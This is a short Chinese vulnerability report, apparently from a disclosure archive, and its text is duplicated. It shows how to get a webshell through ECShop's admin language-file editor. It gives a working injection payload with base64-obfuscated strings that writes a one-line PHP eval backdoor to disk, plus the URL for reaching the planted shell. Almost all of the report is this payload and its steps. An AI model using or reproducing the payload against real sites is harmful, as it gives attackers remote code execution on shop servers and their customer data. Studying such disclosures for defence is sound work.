### 简要描述: ecshop后台拿webshell ### 详细说明: 模板管理--语言项编辑 如:user.php 搜索:状态 插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}} 访问http://localhost/ecshop/languages/zh_cn/user.php 一句话:http://localhost/ecshop/languages/zh_cn/fuck.php ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/290007225237e02dd5bffe0ef67c62f1a7bf1963.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/290007225237e02dd5bffe0ef67c62f1a7bf1963.jpg) [<img src="https://images.seebug.org/upload/201305/29000756ba99b2cedf89df850f7aaee01ef759a6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/29000756ba99b2cedf89df850f7aaee01ef759a6.jpg)
### 简要描述: ecshop后台拿webshell ### 详细说明: 模板管理--语言项编辑 如:user.php 搜索:状态 插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}} 访问http://localhost/ecshop/languages/zh_cn/user.php 一句话:http://localhost/ecshop/languages/zh_cn/fuck.php ### 漏洞证明: [<img src="https://images.seebug.org/upload/201305/290007225237e02dd5bffe0ef67c62f1a7bf1963.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/290007225237e02dd5bffe0ef67c62f1a7bf1963.jpg) [<img src="https://images.seebug.org/upload/201305/29000756ba99b2cedf89df850f7aaee01ef759a6.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/29000756ba99b2cedf89df850f7aaee01ef759a6.jpg)